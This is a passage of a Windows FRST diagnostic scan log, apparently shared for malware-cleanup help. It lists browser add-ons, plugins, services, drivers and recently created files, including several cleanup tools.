BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO-x32: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll (Yahoo! Inc)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 167.206.245.135 167.206.245.136

FireFox:
========
FF ProfilePath: C:\Users\anonymous\AppData\Roaming\Mozilla\Firefox\Profiles\1j94e34f.default-1417893552894
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_246.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Audiovisual & Graphics\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll (Citrix Systems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Audiovisual & Graphics\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Audiovisual & Graphics\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Security\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Security\Avast\WebRep\FF [2012-06-30]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2013-08-24]
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [webmaster@OpenCloner.com] - C:\Audiovisual & Graphics\Stream Cloner\INSTALLED SC\Stream-Cloner\FireFox
FF Extension: Stream-Cloner launch tool - C:\Audiovisual & Graphics\Stream Cloner\INSTALLED SC\Stream-Cloner\FireFox [2013-12-15]
FF HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Security\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-11-28]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 AdobeActiveFileMonitor10.0; C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-14] (Adobe Systems Incorporated)
R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [106144 2011-12-29] (Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Security\Avast\AvastSvc.exe [50344 2014-11-28] (AVAST Software)
R3 AvastVBoxSvc; C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe [4012248 2014-11-28] (Avast Software)
S2 DellDigitalDelivery; c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [162816 2011-10-26] (Dell Products, LP.) [File not signed]
R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-08-07] (Garmin Ltd or its subsidiaries)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-01-21] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [158880 2011-12-29] (Atheros) [File not signed]
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [76960 2011-12-26] (Atheros) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-11-28] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2014-11-28] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-11-28] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-11-28] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2014-11-28] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2014-11-28] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [116728 2014-11-28] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2014-11-28] ()
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2012-11-02] ()
S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R2 VBoxAswDrv; C:\Security\Avast\ng\vbox\VBoxAswDrv.sys [271752 2014-11-28] (Avast Software)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-02 15:45 - 2015-01-02 15:45 - 00028696 _____ () C:\Users\anonymous\Desktop\FRST.txt
2015-01-02 15:44 - 2015-01-02 15:45 - 00000000 ____D () C:\FRST
2015-01-02 15:44 - 2015-01-02 15:44 - 00005252 _____ () C:\Windows\WindowsUpdate.log
2015-01-02 15:44 - 2014-12-28 08:49 - 02122752 _____ (Farbar) C:\Users\anonymous\Desktop\FRST64.exe
2015-01-02 15:43 - 2015-01-02 15:43 - 00000155 _____ () C:\Windows\system32\2015-01-02-20-43-11.042-AvastVBoxSVC.exe-8972.log
2015-01-02 15:41 - 2015-01-02 15:41 - 00354232 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-01-02 15:41 - 2015-01-02 15:41 - 00090368 _____ () C:\Users\anonymous\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-02 15:41 - 2015-01-02 15:41 - 00000056 _____ () C:\Windows\setupact.log
2015-01-02 15:41 - 2015-01-02 15:41 - 00000000 ___RD () C:\Users\anonymous\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2015-01-02 15:41 - 2015-01-02 15:41 - 00000000 _____ () C:\Windows\setuperr.log
2014-12-30 17:14 - 2014-12-30 17:15 - 00000155 _____ () C:\Windows\system32\2014-12-30-22-14-51.015-AvastVBoxSVC.exe-4864.log
2014-12-28 12:19 - 2014-12-28 12:19 - 00000155 _____ () C:\Windows\system32\2014-12-28-17-19-20.069-AvastVBoxSVC.exe-4152.log
2014-12-28 09:26 - 2014-12-28 09:26 - 00000155 _____ () C:\Windows\system32\2014-12-28-14-26-14.010-AvastVBoxSVC.exe-4132.log
2014-12-28 08:56 - 2014-12-28 08:52 - 00688992 ____R (Swearware) C:\Users\anonymous\Desktop\dds.com
2014-12-28 08:07 - 2014-12-28 08:07 - 00000155 _____ () C:\Windows\system32\2014-12-28-13-07-21.019-AvastVBoxSVC.exe-4280.log
2014-12-28 05:55 - 2014-12-28 05:56 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-55-57.042-AvastVBoxSVC.exe-4184.log
2014-12-28 05:38 - 2014-12-28 08:59 - 00000000 ____D () C:\Users\anonymous\Desktop\PROBLEM
2014-12-28 05:13 - 2014-12-28 05:14 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-13-51.004-AvastVBoxSVC.exe-4260.log
2014-12-28 05:06 - 2014-12-28 05:06 - 00000155 _____ () C:\Windows\system32\2014-12-28-10-06-44.012-AvastVBoxSVC.exe-4712.log
2014-12-28 04:36 - 2014-12-28 04:44 - 00024064 ____H () C:\Users\anonymous\Desktop\~WRL0001.tmp
2014-12-28 04:36 - 2014-12-28 04:36 - 00001153 _____ () C:\Users\anonymous\Desktop\Mozilla Firefox.lnk
2014-12-28 04:35 - 2014-12-28 04:36 - 00000155 _____ () C:\Windows\system32\2014-12-28-09-35-50.013-AvastVBoxSVC.exe-4880.log
2014-12-27 22:11 - 2014-12-27 22:11 - 00000155 _____ () C:\Windows\system32\2014-12-28-03-11-11.081-AvastVBoxSVC.exe-4148.log
2014-12-27 19:44 - 2014-12-27 19:44 - 00000155 ____N () C:\Windows\system32\2014-12-28-00-44-03.041-AvastVBoxSVC.exe-7120.log
2014-12-27 19:04 - 2014-12-27 19:04 - 00000155 ____N () C:\Windows\system32\2014-12-28-00-04-48.054-AvastVBoxSVC.exe-5012.log
2014-12-27 18:56 - 2014-12-27 18:57 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-56-52.003-AvastVBoxSVC.exe-4612.log
2014-12-27 18:40 - 2014-12-27 18:40 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-40-03.038-AvastVBoxSVC.exe-5852.log
2014-12-27 18:31 - 2014-12-27 18:32 - 00000155 ____N () C:\Windows\system32\2014-12-27-23-31-48.033-AvastVBoxSVC.exe-4956.log
2014-12-27 18:01 - 2014-12-27 18:01 - 00000240 ____N () C:\Users\anonymous\Desktop\5FU.txt
2014-12-17 13:31 - 2014-12-13 00:09 - 00144384 ____N (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-17 13:31 - 2014-12-12 22:33 - 00115712 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-12 03:18 - 2014-12-12 03:18 - 00000155 ____N () C:\Windows\system32\2014-12-12-08-18-54.004-AvastVBoxSVC.exe-4304.log
2014-12-11 03:23 - 2014-12-11 03:23 - 00000155 ____N () C:\Windows\system32\2014-12-11-08-23-20.065-AvastVBoxSVC.exe-4148.log
2014-12-11 03:20 - 2014-12-11 03:20 - 00000000 ____D () C:\Windows\system32\appraiser
2014-12-11 03:01 - 2014-10-17 21:05 - 04121600 ____N (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-11 03:01 - 2014-10-17 20:33 - 03209728 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00830976 ____N (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00741376 ____N (Microsoft Corporation) C:\Windows\system32\invagent.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00413184 ____N (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00396800 ____N (Microsoft Corporation) C:\Windows\system32\devinv.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00227328 ____N (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-12-10 06:19 - 2014-12-03 21:50 - 00192000 ____N (Microsoft Corporation) C:\Windows\system32\aepic.dll
2014-12-10 06:19 - 2014-12-03 21:44 - 01083392 ____N (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-12-10 06:19 - 2014-12-01 18:28 - 01232040 ____N (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2014-12-10 06:18 - 2014-11-26 20:43 - 00389296 ____N (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-10 06:18 - 2014-11-26 20:10 - 00342200 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-10 06:18 - 2014-11-21 22:13 - 25059840 ____N (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-10 06:18 - 2014-11-21 22:06 - 02724864 ____N (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-10 06:18 - 2014-11-21 22:06 - 00004096 ____N (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-10 06:18 - 2014-11-21 21:50 - 00580096 ____N (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-10 06:18 - 2014-11-21 21:50 - 00066560 ____N (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-10 06:18 - 2014-11-21 21:49 - 02885120 ____N (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-10 06:18 - 2014-11-21 21:49 - 00048640 ____N (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-10 06:18 - 2014-11-21 21:48 - 00088064 ____N (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-10 06:18 - 2014-11-21 21:41 - 00054784 ____N (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-10 06:18 - 2014-11-21 21:40 - 00034304 ____N (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-10 06:18 - 2014-11-21 21:37 - 00633856 ____N (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-10 06:18 - 2014-11-21 21:35 - 00114688 ____N (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-10 06:18 - 2014-11-21 21:34 - 06039552 ____N (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-10 06:18 - 2014-11-21 21:34 - 00814080 ____N (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-10 06:18 - 2014-11-21 21:26 - 00968704 ____N (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-10 06:18 - 2014-11-21 21:22 - 19749376 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-10 06:18 - 2014-11-21 21:22 - 00490496 ____N (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-10 06:18 - 2014-11-21 21:20 - 02724864 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-10 06:18 - 2014-11-21 21:14 - 00077824 ____N (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-10 06:18 - 2014-11-21 21:09 - 00199680 ____N (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-10 06:18 - 2014-11-21 21:08 - 00092160 ____N (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-10 06:18 - 2014-11-21 21:07 - 00501248 ____N (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-10 06:18 - 2014-11-21 21:07 - 00062464 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-10 06:18 - 2014-11-21 21:06 - 00047616 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-10 06:18 - 2014-11-21 21:05 - 00316928 ____N (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-10 06:18 - 2014-11-21 21:05 - 00064000 ____N (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-10 06:18 - 2014-11-21 21:01 - 02277888 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-10 06:18 - 2014-11-21 20:59 - 00047104 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-10 06:18 - 2014-11-21 20:58 - 00030720 ____N (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-10 06:18 - 2014-11-21 20:56 - 00478208 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-10 06:18 - 2014-11-21 20:54 - 00620032 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-10 06:18 - 2014-11-21 20:49 - 00800768 ____N (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-10 06:18 - 2014-11-21 20:49 - 00718848 ____N (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-10 06:18 - 2014-11-21 20:47 - 01359360 ____N (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-10 06:18 - 2014-11-21 20:46 - 02125312 ____N (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-10 06:18 - 2014-11-21 20:45 - 00418304 ____N (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-10 06:18 - 2014-11-21 20:43 - 14412800 ____N (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-10 06:18 - 2014-11-21 20:40 - 00060416 ____N (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-10 06:18 - 2014-11-21 20:36 - 00168960 ____N (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-10 06:18 - 2014-11-21 20:35 - 00076288 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-10 06:18 - 2014-11-21 20:33 - 00285696 ____N (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-10 06:18 - 2014-11-21 20:29 - 04299264 ____N (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-10 06:18 - 2014-11-21 20:28 - 02358272 ____N (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-10 06:18 - 2014-11-21 20:23 - 00688640 ____N (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-10 06:18 - 2014-11-21 20:22 - 02052096 ____N (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-10 06:18 - 2014-11-21 20:21 - 01155072 ____N (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-10 06:18 - 2014-11-21 20:15 - 01548288 ____N (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-10 06:18 - 2014-11-21 20:13 - 12836864 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-10 06:18 - 2014-11-21 20:03 - 00800768 ____N (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-10 06:18 - 2014-11-21 20:00 - 01888256 ____N (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-10 06:18 - 2014-11-21 19:56 - 01307136 ____N (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-10 06:18 - 2014-11-21 19:54 - 00710144 ____N (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-10 06:18 - 2014-11-10 22:09 - 01424384 ____N (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-10 06:18 - 2014-11-10 21:44 - 01230336 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-10 06:18 - 2014-11-10 20:46 - 00119296 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-10 06:14 - 2014-11-07 22:16 - 00002048 ____N (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-10 06:14 - 2014-11-07 21:45 - 00002048 ____N (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-10 06:14 - 2014-10-29 21:03 - 00165888 ____N (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-10 06:14 - 2014-10-29 20:45 - 00155136 ____N (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-10 06:14 - 2014-10-02 21:12 - 02020352 ____N (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00346624 ____N (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00310272 ____N (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-10 06:14 - 2014-10-02 21:12 - 00181248 ____N (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-10 06:14 - 2014-10-02 21:11 - 00266240 ____N (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-10 06:14 - 2014-10-02 20:45 - 01177088 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00248832 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00214016 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-10 06:14 - 2014-10-02 20:45 - 00145920 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-10 06:14 - 2014-10-02 20:44 - 00198656 ____N (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-10 04:43 - 2014-12-10 04:43 - 00450776 ____R () C:\Windows\system32\Drivers\etc\hosts.20141210-044312.backup
2014-12-06 16:01 - 2014-12-06 16:01 - 00000000 ____D () C:\Users\anonymous\AppData\Roaming\PCDr
2014-12-06 16:01 - 2014-12-06 16:01 - 00000000 ____D () C:\ProgramData\PCDr
2014-12-06 15:12 - 2014-12-06 15:11 - 00000993 ____N () C:\Users\anonymous\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-06 14:30 - 2014-12-06 14:35 - 00000000 ____D () C:\AdwCleaner
2014-12-06 14:30 - 2014-12-06 14:34 - 00000110 ____N () C:\AdwCleanerDebug.txt
2014-12-06 14:10 - 2014-12-06 14:10 - 00000155 ____N () C:\Windows\system32\2014-12-06-19-10-09.012-AvastVBoxSVC.exe-7476.log
2014-12-05 17:48 - 2014-12-20 14:12 - 00000000 ____D () C:\photos - digital 7
